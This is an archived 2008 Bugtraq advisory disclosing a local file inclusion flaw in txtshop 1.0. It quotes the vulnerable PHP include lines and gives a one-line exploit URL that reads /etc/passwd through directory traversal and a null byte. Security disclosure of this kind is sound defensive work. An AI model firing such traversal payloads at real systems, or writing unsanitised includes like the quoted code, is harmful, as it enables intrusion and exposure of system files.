txtshop - beta 1.0 / Local File Inclusion Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugtraq-owner@xxxxxxxxxxxxxxxxx
- Subject: txtshop - beta 1.0 / Local File Inclusion Vulnerability
- From: Pepelux <pepelux@xxxxxxxxxxxx>
- Date: Thu, 23 Oct 2008 11:32:12 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:sender :to:subject:mime-version:content-type:content-transfer-encoding :content-disposition:x-google-sender-auth; bh=yqTDSUOB0K8V8krgyZ07BmY7bZcE6IgDXI294hrUdl4=; b=j2Td0hcmC9z8uJJFLLzdp0tIFbDbVQH1AxOcIYqO6g81tqLexna/qiBWLsJ/6MvlqP nJ8y1AlFEbY+n9Eupbzo9uymhDi7ss6B8vFV8JAWIBC+h3792tfVQAkLtcDSV9dbOruM yTg89EpO8kblytvHCv4iZg2sA9tHr6xBz4ViA=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:sender:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition:x-google-sender-auth; b=B8e1OX0lZj6BLuiLzLCDq+ylI0EzTpr42GOXFz6U4GYu6XejihgzyemxA/EEbcFfNH 6+tdo2Qex45/2z16QRY/4MQQMP0z7IvN9qgO9HdrpKLjQQOyCkapNNAHbOn/ICdyT32B zfF8+X1dCuJBY0JWGjXhH3rTKXgJrrKy3u7xo=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
- Sender: pepeluxx@xxxxxxxxx
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
txtshop - beta 1.0 / Local File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$ Program: txtshop
$ Version: <= 1.0
$ File affected: ADMIN/header.php
$ Download: http://sourceforge.net/projects/txtshop/
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
--Bug --
4. if (!$language)$language="ch";
5. include_once("../lib/lang.".$language.".php");
-- Exploit --
http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00